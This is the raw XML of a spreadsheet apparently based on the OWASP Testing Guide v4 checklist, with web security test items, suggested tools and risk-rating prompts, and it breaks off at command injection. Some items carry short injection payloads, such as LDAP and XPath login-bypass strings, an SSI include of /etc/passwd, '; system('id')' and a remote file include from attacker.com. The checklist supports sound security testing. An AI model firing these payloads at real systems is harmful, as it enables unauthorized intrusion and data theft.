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ing Checklist" sheetId="1" state="visible" r:id="rId2"/>
    <sheet name="Summary Findings" sheetId="2" state="visible" r:id="rId3"/>
    <sheet name="Risk Assessment Calculator" sheetId="3" state="visible" r:id="rId4"/>
    <sheet name="References" sheetId="4" state="visible" r:id="rId5"/>
  </sheets>
  <definedNames>
    <definedName function="false" hidden="false" name="Awareness" vbProcedure="false">References!$M$3:$M$7</definedName>
    <definedName function="false" hidden="false" name="EaseofExploit" vbProcedure="false">References!$K$3:$K$7</definedName>
    <definedName function="false" hidden="false" name="EasyofDiscovery" vbProcedure="false">References!$I$3:$I$7</definedName>
    <definedName function="false" hidden="false" name="FinancialDamage" vbProcedure="false">References!$I$12:$I$16</definedName>
    <definedName function="false" hidden="false" name="IntrusionDetection" vbProcedure="false">References!$O$3:$O$7</definedName>
    <definedName function="false" hidden="false" name="LossofAccountability" vbProcedure="false">References!$G$12:$G$15</definedName>
    <definedName function="false" hidden="false" name="LossofAvailability" vbProcedure="false">References!$E$12:$E$16</definedName>
    <definedName function="false" hidden="false" name="LossofConfidentiality" vbProcedure="false">References!$A$12:$A$16</definedName>
    <definedName function="false" hidden="false" name="LossofIntegrity" vbProcedure="false">References!$C$12:$C$17</definedName>
    <definedName function="false" hidden="false" name="Motive" vbProcedure="false">References!$C$3:$C$6</definedName>
    <definedName function="false" hidden="false" name="NonCompliance" vbProcedure="false">References!$M$12:$M$15</definedName>
    <definedName function="false" hidden="false" name="Opportunity" vbProcedure="false">References!$E$3:$E$6</definedName>
    <definedName function="false" hidden="false" name="PolicyViolation" vbProcedure="false">References!$O$12:$O$16</definedName>
    <definedName function="false" hidden="false" name="PopulationSize" vbProcedure="false">References!$G$3:$G$8</definedName>
    <definedName function="false" hidden="false" name="ReputationDamage" vbProcedure="false">References!$K$12:$K$16</definedName>
    <definedName function="false" hidden="false" name="result" vbProcedure="false">'Testing Checklist'!$A$128:$A$130</definedName>
    <definedName function="false" hidden="false" name="SkillRequired" vbProcedure="false">References!$A$3:$A$8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5" authorId="0">
      <text>
        <r>
          <rPr>
            <b val="true"/>
            <sz val="9"/>
            <color rgb="FF000000"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
            <charset val="1"/>
          </rPr>
          <t xml:space="preserve">How technically skilled is this group of threat agents? </t>
        </r>
      </text>
    </comment>
    <comment ref="A6" authorId="0">
      <text>
        <r>
          <rPr>
            <b val="true"/>
            <sz val="9"/>
            <color rgb="FF000000"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
            <charset val="1"/>
          </rPr>
          <t xml:space="preserve">How motivated is this group of threat agents to find and exploit this vulnerability?</t>
        </r>
      </text>
    </comment>
    <comment ref="A7" authorId="0">
      <text>
        <r>
          <rPr>
            <b val="true"/>
            <sz val="9"/>
            <color rgb="FF000000"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
            <charset val="1"/>
          </rPr>
          <t xml:space="preserve">What resources and opportunities are required for this group of threat agents to find and exploit this vulnerability?</t>
        </r>
      </text>
    </comment>
    <comment ref="A8" authorId="0">
      <text>
        <r>
          <rPr>
            <b val="true"/>
            <sz val="9"/>
            <color rgb="FF000000"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
            <charset val="1"/>
          </rPr>
          <t xml:space="preserve">How large is this group of threat agents?</t>
        </r>
      </text>
    </comment>
    <comment ref="A11" authorId="0">
      <text>
        <r>
          <rPr>
            <b val="true"/>
            <sz val="9"/>
            <color rgb="FF000000"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
            <charset val="1"/>
          </rPr>
          <t xml:space="preserve">How easy is it for this group of threat agents to discover this vulnerability?</t>
        </r>
      </text>
    </comment>
    <comment ref="A12" authorId="0">
      <text>
        <r>
          <rPr>
            <b val="true"/>
            <sz val="9"/>
            <color rgb="FF000000"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
            <charset val="1"/>
          </rPr>
          <t xml:space="preserve">How easy is it for this group of threat agents to actually exploit this vulnerability?</t>
        </r>
      </text>
    </comment>
    <comment ref="A13" authorId="0">
      <text>
        <r>
          <rPr>
            <b val="true"/>
            <sz val="9"/>
            <color rgb="FF000000"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
            <charset val="1"/>
          </rPr>
          <t xml:space="preserve">How well known is this vulnerability to this group of threat agents?</t>
        </r>
      </text>
    </comment>
    <comment ref="A14" authorId="0">
      <text>
        <r>
          <rPr>
            <b val="true"/>
            <sz val="9"/>
            <color rgb="FF000000"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
            <charset val="1"/>
          </rPr>
          <t xml:space="preserve">How likely is an exploit to be detected?</t>
        </r>
      </text>
    </comment>
    <comment ref="F5" authorId="0">
      <text>
        <r>
          <rPr>
            <b val="true"/>
            <sz val="9"/>
            <color rgb="FF000000"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
            <charset val="1"/>
          </rPr>
          <t xml:space="preserve">How much data could be disclosed and how sensitive is it?</t>
        </r>
      </text>
    </comment>
    <comment ref="F6" authorId="0">
      <text>
        <r>
          <rPr>
            <b val="true"/>
            <sz val="9"/>
            <color rgb="FF000000"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
            <charset val="1"/>
          </rPr>
          <t xml:space="preserve">How much data could be corrupted and how damaged is it?</t>
        </r>
      </text>
    </comment>
    <comment ref="F7" authorId="0">
      <text>
        <r>
          <rPr>
            <b val="true"/>
            <sz val="9"/>
            <color rgb="FF000000"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
            <charset val="1"/>
          </rPr>
          <t xml:space="preserve">How much service could be lost and how vital is it?</t>
        </r>
      </text>
    </comment>
    <comment ref="F8" authorId="0">
      <text>
        <r>
          <rPr>
            <b val="true"/>
            <sz val="9"/>
            <color rgb="FF000000"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
            <charset val="1"/>
          </rPr>
          <t xml:space="preserve">Are the threat agents' actions traceable to an individual?</t>
        </r>
      </text>
    </comment>
    <comment ref="F11" authorId="0">
      <text>
        <r>
          <rPr>
            <b val="true"/>
            <sz val="9"/>
            <color rgb="FF000000"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
            <charset val="1"/>
          </rPr>
          <t xml:space="preserve">How much financial damage will result from an exploit?</t>
        </r>
      </text>
    </comment>
    <comment ref="F12" authorId="0">
      <text>
        <r>
          <rPr>
            <b val="true"/>
            <sz val="9"/>
            <color rgb="FF000000"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
            <charset val="1"/>
          </rPr>
          <t xml:space="preserve">Would an exploit result in reputation damage that would harm the business?</t>
        </r>
      </text>
    </comment>
    <comment ref="F13" authorId="0">
      <text>
        <r>
          <rPr>
            <b val="true"/>
            <sz val="9"/>
            <color rgb="FF000000"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
            <charset val="1"/>
          </rPr>
          <t xml:space="preserve">How much exposure does non-compliance introduce?</t>
        </r>
      </text>
    </comment>
    <comment ref="F14" authorId="0">
      <text>
        <r>
          <rPr>
            <b val="true"/>
            <sz val="9"/>
            <color rgb="FF000000"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
            <charset val="1"/>
          </rPr>
          <t xml:space="preserve">How much personally identifiable information could be disclosed?</t>
        </r>
      </text>
    </comment>
  </commentList>
</comments>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="744" uniqueCount="464">
  <si>
    <t xml:space="preserve">OWASP: Testing Guide v4 Checklist</t>
  </si>
  <si>
    <t xml:space="preserve">Information Gathering</t>
  </si>
  <si>
    <t xml:space="preserve">Test Name</t>
  </si>
  <si>
    <t xml:space="preserve">Description</t>
  </si>
  <si>
    <t xml:space="preserve">Tools</t>
  </si>
  <si>
    <t xml:space="preserve">Result</t>
  </si>
  <si>
    <t xml:space="preserve">Remark</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-INFO-001</t>
  </si>
  <si>
    <t xml:space="preserve">Conduct Search Engine Discovery and Reconnaissance for Information Leakage</t>
  </si>
  <si>
    <t xml:space="preserve">Use a search engine to search for Network diagrams and Configurations, Credentials, Error message content.</t>
  </si>
  <si>
    <t xml:space="preserve">Google Hacking, Sitedigger, Shodan, FOCA, Punkspider</t>
  </si>
  <si>
    <t xml:space="preserve">Not Started</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-INFO-002</t>
  </si>
  <si>
    <t xml:space="preserve">Fingerprint Web Server</t>
  </si>
  <si>
    <t xml:space="preserve">Find the version and type of a running web server to determine known vulnerabilities and the appropriate exploits. Using
"HTTP header field ordering" and "Malformed requests test".</t>
  </si>
  <si>
    <t xml:space="preserve">Httprint, Httprecon, Desenmascarame</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-INFO-003</t>
  </si>
  <si>
    <t xml:space="preserve">Review Webserver Metafiles for Information Leakage</t>
  </si>
  <si>
    <t xml:space="preserve">Analyze robots.txt and identify &lt;META&gt; Tags from website.</t>
  </si>
  <si>
    <t xml:space="preserve">Browser, curl, wget</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-INFO-004</t>
  </si>
  <si>
    <t xml:space="preserve">Enumerate Applications on Webserver</t>
  </si>
  <si>
    <t xml:space="preserve">Find applications hosted in the webserver (Virtual hosts/Subdomain), non-standard ports, DNS zone transfers</t>
  </si>
  <si>
    <t xml:space="preserve">Webhosting.info, dnsrecon, Nmap, fierce, Recon-ng, Intrigue</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-INFO-005</t>
  </si>
  <si>
    <t xml:space="preserve">Review Webpage Comments and Metadata for Information Leakage</t>
  </si>
  <si>
    <t xml:space="preserve">Find sensitive information from webpage comments and Metadata on source code.</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-INFO-006</t>
  </si>
  <si>
    <t xml:space="preserve">Identify application entry points</t>
  </si>
  <si>
    <t xml:space="preserve">Identify from hidden fields, parameters, methods HTTP header analysis</t>
  </si>
  <si>
    <t xml:space="preserve">Burp proxy, ZAP, Tamper data</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-INFO-007</t>
  </si>
  <si>
    <t xml:space="preserve">Map execution paths through application</t>
  </si>
  <si>
    <t xml:space="preserve">Map the target application and understand the principal workflows.</t>
  </si>
  <si>
    <t xml:space="preserve">Burp proxy, ZAP</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-INFO-008</t>
  </si>
  <si>
    <t xml:space="preserve">Fingerprint Web Application Framework</t>
  </si>
  <si>
    <t xml:space="preserve">Find the type of web application framework/CMS from HTTP headers, Cookies, Source code, Specific files and folders.</t>
  </si>
  <si>
    <t xml:space="preserve">Whatweb, BlindElephant, Wappalyzer</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-INFO-009</t>
  </si>
  <si>
    <t xml:space="preserve">Fingerprint Web Application</t>
  </si>
  <si>
    <t xml:space="preserve">Identify the web application and version to determine known vulnerabilities and the appropriate exploits.</t>
  </si>
  <si>
    <t xml:space="preserve">Whatweb, BlindElephant, Wappalyzer, CMSmap</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-INFO-010</t>
  </si>
  <si>
    <t xml:space="preserve">Map Application Architecture</t>
  </si>
  <si>
    <t xml:space="preserve">Identify application architecture including Web language, WAF, Reverse proxy, Application Server, Backend Database</t>
  </si>
  <si>
    <t xml:space="preserve">Configuration and Deploy Management Testing</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-CONFIG-001</t>
  </si>
  <si>
    <t xml:space="preserve">Test Network/Infrastructure Configuration</t>
  </si>
  <si>
    <t xml:space="preserve">Understand the infrastructure elements interactions, config management for software, backend DB server, WebDAV, FTP in order to identify known vulnerabilities.</t>
  </si>
  <si>
    <t xml:space="preserve">Nessus</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-CONFIG-002</t>
  </si>
  <si>
    <t xml:space="preserve">Test Application Platform Configuration</t>
  </si>
  <si>
    <t xml:space="preserve">Identify default installation file/directory, Handle Server errors (40*,50*), Minimal Privilege, Software logging.</t>
  </si>
  <si>
    <t xml:space="preserve">Browser, Nikto</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-CONFIG-003</t>
  </si>
  <si>
    <t xml:space="preserve">Test File Extensions Handling for Sensitive Information</t>
  </si>
  <si>
    <t xml:space="preserve">Find important file, information (.asa , .inc , .sql ,zip, tar, pdf, txt, etc)</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-CONFIG-004</t>
  </si>
  <si>
    <t xml:space="preserve">Backup and Unreferenced Files for Sensitive Information</t>
  </si>
  <si>
    <t xml:space="preserve">Check JS source code, comments, cache file, backup file (.old, .bak, .inc, .src) and guessing of filename</t>
  </si>
  <si>
    <t xml:space="preserve">Nessus, Nikto, Wikto</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-CONFIG-005</t>
  </si>
  <si>
    <t xml:space="preserve">Enumerate Infrastructure and Application Admin Interfaces</t>
  </si>
  <si>
    <t xml:space="preserve">Directory and file enumeration, comments and links in source (/admin, /administrator, /backoffice, /backend, etc), alternative server port (Tomcat/8080)</t>
  </si>
  <si>
    <t xml:space="preserve">Burp Proxy, dirb, Dirbuster, fuzzdb, Tilde Scanner</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-CONFIG-006</t>
  </si>
  <si>
    <t xml:space="preserve">Test HTTP Methods</t>
  </si>
  <si>
    <t xml:space="preserve">Identify HTTP allowed methods on Web server with OPTIONS. Arbitrary HTTP Methods, HEAD access control bypass and XST</t>
  </si>
  <si>
    <t xml:space="preserve">netcat, curl</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-CONFIG-007</t>
  </si>
  <si>
    <t xml:space="preserve">Test HTTP Strict Transport Security</t>
  </si>
  <si>
    <t xml:space="preserve">Identify HSTS header on Web server through HTTP response header. 
curl -s -D- https://domain.com/ | grep Strict</t>
  </si>
  <si>
    <t xml:space="preserve">Burp Proxy, ZAP, curl</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-CONFIG-008</t>
  </si>
  <si>
    <t xml:space="preserve">Test RIA cross domain policy</t>
  </si>
  <si>
    <t xml:space="preserve">Analyse the permissions allowed from the policy files (crossdomain.xml/clientaccesspolicy.xml) and allow-access-from.</t>
  </si>
  <si>
    <t xml:space="preserve">Burp Proxy, ZAP, Nikto</t>
  </si>
  <si>
    <t xml:space="preserve">Identity Management Testing</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-IDENT-001</t>
  </si>
  <si>
    <t xml:space="preserve">Test Role Definitions</t>
  </si>
  <si>
    <t xml:space="preserve">Validate the system roles defined within the application by creating permission matrix.</t>
  </si>
  <si>
    <t xml:space="preserve">Burp Proxy, ZAP</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-IDENT-002</t>
  </si>
  <si>
    <t xml:space="preserve">Test User Registration Process</t>
  </si>
  <si>
    <t xml:space="preserve">Verify that the identity requirements for user registration are aligned
with business and security requirements:</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-IDENT-003</t>
  </si>
  <si>
    <t xml:space="preserve">Test Account Provisioning Process</t>
  </si>
  <si>
    <t xml:space="preserve">Determine which roles are able to provision users and what sort of
accounts they can provision.</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-IDENT-004</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for Account Enumeration and Guessable User Account</t>
  </si>
  <si>
    <t xml:space="preserve">Generic login error statement check, return codes/parameter values, enumerate all possible valid userids (Login system, Forgot password)</t>
  </si>
  <si>
    <t xml:space="preserve">Browser, Burp Proxy, ZAP</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-IDENT-005</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for Weak or unenforced username policy</t>
  </si>
  <si>
    <t xml:space="preserve">User account names are often highly structured (e.g. Joe Bloggs
account name is jbloggs and Fred Nurks account name is fnurks)
and valid account names can easily be guessed.</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-IDENT-006</t>
  </si>
  <si>
    <t xml:space="preserve">Test Permissions of Guest/Training Accounts</t>
  </si>
  <si>
    <t xml:space="preserve">Guest and Training accounts are useful ways to acquaint potential users with system functionality prior to them completing the authorisation process required for access.Evaluate consistency between access policy and guest/training account access permissions.</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-IDENT-007</t>
  </si>
  <si>
    <t xml:space="preserve">Test Account Suspension/Resumption Process</t>
  </si>
  <si>
    <t xml:space="preserve">Verify the identity requirements for user registration align with business/security requirements. Validate the registration process.</t>
  </si>
  <si>
    <t xml:space="preserve">Authentication Testing</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-AUTHN-001</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for Credentials Transported over an Encrypted Channel</t>
  </si>
  <si>
    <t xml:space="preserve">Check referrer whether its HTTP or HTTPs. Sending data through HTTP and HTTPS.</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-AUTHN-002</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for default credentials</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for default credentials of common applications, Testing for default password of new accounts.</t>
  </si>
  <si>
    <t xml:space="preserve">Burp Proxy, ZAP, Hydra</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-AUTHN-003</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for Weak lock out mechanism</t>
  </si>
  <si>
    <t xml:space="preserve">Evaluate the account lockout mechanism’s ability to mitigate
brute force password guessing. Evaluate the unlock mechanism’s resistance to unauthorized account unlocking.</t>
  </si>
  <si>
    <t xml:space="preserve">Browser</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-AUTHN-004</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for bypassing authentication schema</t>
  </si>
  <si>
    <t xml:space="preserve">Force browsing (/admin/main.php, /page.asp?authenticated=yes), Parameter Modification, Session ID prediction, SQL Injection</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-AUTHN-005</t>
  </si>
  <si>
    <t xml:space="preserve">Test remember password functionality</t>
  </si>
  <si>
    <t xml:space="preserve">Look for passwords being stored in a cookie. Examine the cookies stored by the application. Verify that the credentials are not stored in clear text, but are hashed. Autocompleted=off?</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-AUTHN-006</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for Browser cache weakness</t>
  </si>
  <si>
    <t xml:space="preserve">Check browser history issue by clicking "Back" button after logging out. Check browser cache issue from HTTP response headers (Cache-Control: no-cache)</t>
  </si>
  <si>
    <t xml:space="preserve">Burp Proxy, ZAP, Firefox add-on CacheViewer2</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-AUTHN-007</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for Weak password policy</t>
  </si>
  <si>
    <t xml:space="preserve">Determine the resistance of the application against brute force
password guessing using available password dictionaries by evaluating the length, complexity, reuse and aging requirements of
passwords.</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-AUTHN-008</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for Weak security question/answer</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for weak pre-generated questions, Testing for weak self-generated question, Testing for brute-forcible answers (Unlimited attempts?)</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-AUTHN-009</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for weak password change or reset functionalities</t>
  </si>
  <si>
    <t xml:space="preserve">Test password reset (Display old password in plain-text?, Send via email?, Random token on confirmation email ?), Test password change (Need old password?), CSRF vulnerability ?</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-AUTHN-010</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for Weaker authentication in alternative channel</t>
  </si>
  <si>
    <t xml:space="preserve">Understand the primary mechanism and Identify other channels (Mobile App, Call center, SSO)</t>
  </si>
  <si>
    <t xml:space="preserve">Authorization Testing </t>
  </si>
  <si>
    <t xml:space="preserve">OTG-AUTHZ-001</t>
  </si>
  <si>
    <t xml:space="preserve">Testing Directory traversal/file include</t>
  </si>
  <si>
    <t xml:space="preserve">dot-dot-slash attack (../), Directory traversal, Local File inclusion/Remote File Inclusion.</t>
  </si>
  <si>
    <t xml:space="preserve">Burp Proxy, ZAP, Wfuzz</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-AUTHZ-002</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for bypassing authorization schema</t>
  </si>
  <si>
    <t xml:space="preserve">Access a resource without authentication?, Bypass ACL, Force browsing (/admin/adduser.jsp)</t>
  </si>
  <si>
    <t xml:space="preserve">Burp Proxy (Autorize), ZAP</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-AUTHZ-003</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for Privilege Escalation</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for role/privilege manipulate the values of hidden variables. Change some param groupid=2 to groupid=1</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-AUTHZ-004</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for Insecure Direct Object References</t>
  </si>
  <si>
    <t xml:space="preserve">Force changing parameter value (?invoice=123 -&gt; ?invoice=456)</t>
  </si>
  <si>
    <t xml:space="preserve">Session Management Testing</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-SESS-001</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for Bypassing Session Management Schema</t>
  </si>
  <si>
    <t xml:space="preserve">SessionID analysis prediction, unencrypted cookie transport, brute-force.</t>
  </si>
  <si>
    <t xml:space="preserve">Burp Proxy, ForceSSL, ZAP, CookieDigger</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-SESS-002</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for Cookies attributes</t>
  </si>
  <si>
    <t xml:space="preserve">Check HTTPOnly and Secure flag, expiration, inspect for sensitive data.</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-SESS-003</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for Session Fixation</t>
  </si>
  <si>
    <t xml:space="preserve">The application doesn't renew the cookie after a successfully user authentication.</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-SESS-004</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for Exposed Session Variables</t>
  </si>
  <si>
    <t xml:space="preserve">Encryption &amp; Reuse of session Tokens vulnerabilities, Send sessionID with GET method ?</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-SESS-005</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for Cross Site Request Forgery</t>
  </si>
  <si>
    <t xml:space="preserve">URL analysis, Direct access to functions without any token.</t>
  </si>
  <si>
    <t xml:space="preserve">Burp Proxy (csrf_token_detect), burpy, ZAP</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-SESS-006</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for logout functionality</t>
  </si>
  <si>
    <t xml:space="preserve">Check reuse session after logout both server-side and SSO.</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-SESS-007</t>
  </si>
  <si>
    <t xml:space="preserve">Test Session Timeout</t>
  </si>
  <si>
    <t xml:space="preserve">Check session timeout, after the timeout has passed, all session tokens should be destroyed or be unusable.</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-SESS-008</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for Session puzzling</t>
  </si>
  <si>
    <t xml:space="preserve">The application uses the same session variable for more than one purpose. An attacker can potentially access pages in an order unanticipated by the developers so that the session variable is set in one context and then used in another.</t>
  </si>
  <si>
    <t xml:space="preserve">Data Validation Testing</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-INPVAL-001</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for Reflected Cross Site Scripting</t>
  </si>
  <si>
    <t xml:space="preserve">Check for input validation, Replace the vector used to identify XSS, XSS with HTTP Parameter Pollution.</t>
  </si>
  <si>
    <t xml:space="preserve">Burp Proxy, ZAP, Xenotix XSS</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-INPVAL-002</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for Stored Cross Site Scripting</t>
  </si>
  <si>
    <t xml:space="preserve">Check input forms/Upload forms and analyze HTML codes, Leverage XSS with BeEF</t>
  </si>
  <si>
    <t xml:space="preserve">Burp Proxy, ZAP, BeEF, XSS Proxy</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-INPVAL-003</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for HTTP Verb Tampering</t>
  </si>
  <si>
    <t xml:space="preserve">Craft custom HTTP requests to test the other methods to bypass URL authentication and authorization.</t>
  </si>
  <si>
    <t xml:space="preserve">netcat</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-INPVAL-004</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for HTTP Parameter pollution</t>
  </si>
  <si>
    <t xml:space="preserve">Identify any form or action that allows user-supplied input to bypass Input validation and filters using HPP</t>
  </si>
  <si>
    <t xml:space="preserve">ZAP, HPP Finder (Chrome Plugin)</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-INPVAL-005</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for SQL Injection</t>
  </si>
  <si>
    <t xml:space="preserve">Union, Boolean, Error based, Out-of-band, Time delay.</t>
  </si>
  <si>
    <t xml:space="preserve">Burp Proxy (SQLipy), SQLMap, Pangolin, Seclists (FuzzDB)</t>
  </si>
  <si>
    <t xml:space="preserve">Oracle Testing</t>
  </si>
  <si>
    <t xml:space="preserve">Identify URLs for PL/SQL web applications, Access with PL/SQL Packages, Bypass PL/SQL Exclusion list, SQL Injection</t>
  </si>
  <si>
    <t xml:space="preserve">Orascan, SQLInjector</t>
  </si>
  <si>
    <t xml:space="preserve">MySQL Testing</t>
  </si>
  <si>
    <t xml:space="preserve">Identify MySQL version, Single quote, Information_schema, Read/Write file.</t>
  </si>
  <si>
    <t xml:space="preserve">SQLMap, Mysqloit, Power Injector</t>
  </si>
  <si>
    <t xml:space="preserve">SQL Server Testing</t>
  </si>
  <si>
    <t xml:space="preserve">Comment operator (- -), Query separator (;), Stored procedures (xp_cmdshell)</t>
  </si>
  <si>
    <t xml:space="preserve">SQLMap, SQLninja, Power Injector</t>
  </si>
  <si>
    <t xml:space="preserve">Testing PostgreSQL</t>
  </si>
  <si>
    <t xml:space="preserve">Determine that the backend database engine is PostgreSQL by using the :: cast operator. Read/Write file, Shell Injection (OS command)</t>
  </si>
  <si>
    <t xml:space="preserve">SQLMap</t>
  </si>
  <si>
    <t xml:space="preserve">MS Access Testing</t>
  </si>
  <si>
    <t xml:space="preserve">Enumerate the column through error-based (Group by), Obtain database schema combine with fuzzdb.</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for NoSQL injection</t>
  </si>
  <si>
    <t xml:space="preserve">Identify NoSQL databases, Pass special characters (' " \ ; { } ), Attack with reserved variable name, operator.</t>
  </si>
  <si>
    <t xml:space="preserve">NoSQLMap</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-INPVAL-006</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for LDAP Injection</t>
  </si>
  <si>
    <t xml:space="preserve">/ldapsearch?user=*
user=*user=*)(uid=*))(|(uid=*
pass=password</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-INPVAL-007</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for ORM Injection</t>
  </si>
  <si>
    <t xml:space="preserve">Testing ORM injection is identical to SQL injection testing</t>
  </si>
  <si>
    <t xml:space="preserve">Hibernate, Nhibernate</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-INPVAL-008</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for XML Injection</t>
  </si>
  <si>
    <t xml:space="preserve">Check with XML Meta Characters
', " , &lt;&gt;, &lt;!--/--&gt;, &amp;, &lt;![CDATA[ / ]]&gt;, XXE, TAG</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-INPVAL-009</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for SSI Injection</t>
  </si>
  <si>
    <t xml:space="preserve">• Presense of .shtml extension
• Check for these characters
&lt; ! # = / . " - &gt; and [a-zA-Z0-9]
• include String = &lt;!--#include virtual="/etc/passwd" --&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-INPVAL-010</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for XPath Injection</t>
  </si>
  <si>
    <t xml:space="preserve">Check for XML error enumeration by supplying a single quote (')
Username: ‘ or ‘1’ = ‘1
Password: ‘ or ‘1’ = ‘1</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-INPVAL-011</t>
  </si>
  <si>
    <t xml:space="preserve">IMAP/SMTP Injection</t>
  </si>
  <si>
    <t xml:space="preserve">• Identifying vulnerable parameters with special characters
(i.e.: \, ‘, “, @, #, !, |)
• Understanding the data flow and deployment structure of the client
• IMAP/SMTP command injection (Header, Body, Footer)</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-INPVAL-012</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for Code Injection</t>
  </si>
  <si>
    <t xml:space="preserve">Enter OS commands in the input field.
?arg=1; system('id')</t>
  </si>
  <si>
    <t xml:space="preserve">Burp Proxy, ZAP, Liffy, Panoptic</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for Local File Inclusion</t>
  </si>
  <si>
    <t xml:space="preserve">LFI with dot-dot-slash (../../), PHP Wrapper (php://filter/convert.base64-encode/resource)</t>
  </si>
  <si>
    <t xml:space="preserve">Burp Proxy, fimap, Liffy</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for Remote File Inclusion</t>
  </si>
  <si>
    <t xml:space="preserve">RFI from malicious URL
?page.php?file=http://attacker.com/malicious_page</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-INPVAL-013</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for Command Injection</t>
  </si>
  <si>
